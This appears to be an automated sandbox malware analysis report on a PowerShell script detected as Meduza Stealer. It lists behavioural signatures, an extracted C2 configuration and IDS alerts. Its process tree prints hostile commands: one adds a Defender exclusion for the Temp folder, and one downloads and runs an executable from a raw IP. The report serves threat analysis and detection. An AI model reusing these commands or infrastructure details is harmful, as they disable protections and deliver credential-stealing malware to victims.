Edit tour
Windows
Analysis Report
script.ps1
Overview
General Information
| Sample name: | script.ps1 |
| Analysis ID: | 1578093 |
| MD5: | 129bf31d3dc155699387ccc33f2f3775 |
| SHA1: | 1f43dcd5742a8f0b499892fd3e09255378817adc |
| SHA256: | b1d2df274b2539ad80debafc925c0cf6a2c2394093e57a8e1d0023d3fc13dba3 |
| Tags: | DLLHijackMeduzaStealerps1user-NDA0E |
| Infos: |   |
 | |
Detection
CredGrabber, Meduza Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CredGrabber
Yara detected Meduza Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Terminates after testing mutex exists (may check infected machine status)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
powershell.exe (PID: 6152 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\scr ipt.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 6536 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
Launcher.exe (PID: 1848 cmdline: "C:\Window s\Temp\Lau ncher.exe" MD5: 2696D944FFBEF69510B0C826446FD748) - powershell.exe (PID: 4164 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -Comma nd "Add-Mp Preference -Exclusio nPath 'C:\ Windows\Te mp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
WmiPrvSE.exe (PID: 576 cmdline: C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - powershell.exe (PID: 7264 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command " iwr -useb 'http://14 7.45.47.15 /duschno.e xe' -OutFi le 'C:\Win dows\Temp\ xdnfl52f.c iv.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
xdnfl52f.civ.exe (PID: 7512 cmdline: "C:\Window s\Temp\xdn fl52f.civ. exe" MD5: C6813DA66EBA357D0DEAA48C2F7032B8)
- cleanup
{"C2 url": "193.3.19.151", "grabber_max_size": 4194304, "anti_vm": true, "anti_dbg": true, "self_destruct": false, "extensions": ".txt", "build_name": "hdont", "links": "", "port": 15666}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MeduzaStealer | Yara detected Meduza Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MeduzaStealer | Yara detected Meduza Stealer | Joe Security | ||
| JoeSecurity_MeduzaStealer | Yara detected Meduza Stealer | Joe Security | ||
| JoeSecurity_CredGrabber | Yara detected CredGrabber | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MeduzaStealer | Yara detected Meduza Stealer | Joe Security | ||
| JoeSecurity_MeduzaStealer | Yara detected Meduza Stealer | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: | ||
| Source: | Author: frack113: | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-19T08:53:04.832885+0100 | 2049441 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 193.3.19.151 | 15666 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-19T08:53:04.832885+0100 | 2050806 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 193.3.19.151 | 15666 | TCP |
| 2024-12-19T08:53:04.952744+0100 | 2050806 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 193.3.19.151 | 15666 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-19T08:53:04.832885+0100 | 2050807 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 193.3.19.151 | 15666 | TCP |
| 2024-12-19T08:53:04.952744+0100 | 2050807 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 193.3.19.151 | 15666 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-19T08:52:42.649350+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 147.45.47.15 | 80 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | ReversingLabs: | ||
| Source: | Virustotal: | Perma Link | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Code function: | 10_2_00007FF75A6E7BA0 | |
| Source: | Code function: | 10_2_00007FF75A6A7C20 | |
| Source: | Code function: | 10_2_00007FF75A6A3A30 | |
| Source: | Code function: | 10_2_00007FF75A6E8020 | |
| Source: | Code function: | 10_2_00007FF75A6E7EC0 | |
| Source: | Code function: | 10_2_00007FF75A6E83C0 | |
| Source: | Code function: | 10_2_00007FF75A6E8440 | |
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 10_2_00007FF75A72B500 | |
| Source: | Code function: | 10_2_00007FF75A72B5B0 | |
| Source: | Code function: | 10_2_00007FF75A6F73F0 | |
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | TCP traffic: | ||
| Source: | HTTP traffic detected: | ||